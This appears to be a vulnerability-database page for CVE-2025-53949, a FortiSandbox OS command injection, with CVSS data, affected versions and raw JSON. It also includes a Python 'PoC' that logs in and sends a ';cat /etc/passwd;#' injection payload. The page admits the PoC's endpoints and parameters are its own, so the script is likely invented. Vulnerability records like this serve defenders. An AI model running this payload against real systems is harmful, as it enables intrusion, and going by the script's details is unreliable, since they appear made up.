Security Vulnerability Report
CVE-2025-53949 CVSS 7.2 HIGH

CVE-2025-53949

Published: 2025-12-09 18:15:54
Last Modified: 2025-12-09 20:12:28

Description

An Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability [CWE-78] in Fortinet FortiSandbox 5.0.0 through 5.0.2, FortiSandbox 4.4.0 through 4.4.7, FortiSandbox 4.2 all versions, FortiSandbox 4.0 all versions may allow an authenticated attacker to execute unauthorized code on the underlying system via crafted HTTP requests.

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Note: the raw JSON record below also carries a second (Primary) CVSS 3.1 assessment of 8.8 HIGH with vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H; the two differ only in Privileges Required (High vs. Low).

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:* - VULNERABLE - FortiSandbox 5.0.0 through 5.0.2
cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:* - VULNERABLE - FortiSandbox 4.4.0 through 4.4.7
cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:* - VULNERABLE - FortiSandbox 4.2 all versions (CPE match range 4.2.0 through 4.2.8)
cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:* - VULNERABLE - FortiSandbox 4.0 all versions (CPE match range 4.0.0 through 4.0.6)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-53949 PoC - FortiSandbox OS Command Injection
# Authentication required (high privilege)
# Note: the endpoint paths and parameter names used below are the PoC's own;
# they are not stated elsewhere on this page.
target = sys.argv[1] if len(sys.argv) > 1 else 'https://target-fortisandbox.local'

# Login to obtain session cookie
login_url = f'{target}/api/v1/auth/login'
credentials = {'username': 'admin', 'password': 'admin_password'}

try:
    session = requests.Session()
    login_response = session.post(login_url, json=credentials, verify=False, timeout=10)
    if login_response.status_code != 200:
        print(f'[-] Authentication failed: {login_response.status_code}')
        sys.exit(1)
    print('[+] Successfully authenticated')

    # Exploit: OS Command Injection via crafted HTTP request
    exploit_url = f'{target}/api/v1/sandbox/submit'
    # Malicious payload - executes arbitrary command
    malicious_params = {
        'file_name': 'test.pdf',
        'file_url': 'http://example.com/test.exe',
        'analysis_type': 'detonate',
        # OS command injection payload
        'custom_field': ';cat /etc/passwd;#',
    }
    exploit_response = session.post(exploit_url, data=malicious_params, verify=False, timeout=10)
    if exploit_response.status_code == 200:
        print('[+] Exploit sent successfully')
        print(f'[+] Response: {exploit_response.text}')
    else:
        print(f'[-] Exploit failed: {exploit_response.status_code}')
except requests.exceptions.RequestException as e:
    print(f'[-] Connection error: {e}')
```

References

https://fortiguard.fortinet.com/psirt/FG-IR-25-479 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53949", "sourceIdentifier": "[email protected]", "published": "2025-12-09T18:15:53.640", "lastModified": "2025-12-09T20:12:27.760", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability [CWE-78] vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.2, FortiSandbox 4.4.0 through 4.4.7, FortiSandbox 4.2 all versions, FortiSandbox 4.0 all versions may allow an authenticated attacker to execute unauthorized code on the underlying system via crafted HTTP requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndIncluding": "4.0.6", "matchCriteriaId": "6AD9ECD5-FE5A-4772-A53A-04769828A110"}, 
{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.2.0", "versionEndIncluding": "4.2.8", "matchCriteriaId": "814D77BE-F536-42DE-B068-F92B95D68248"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.4.0", "versionEndIncluding": "4.4.7", "matchCriteriaId": "08D2984D-3F90-42A6-9DC9-5E853E7B3188"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndIncluding": "5.0.2", "matchCriteriaId": "C5335FAF-6569-44CE-8634-0991C738CCF9"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-479", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}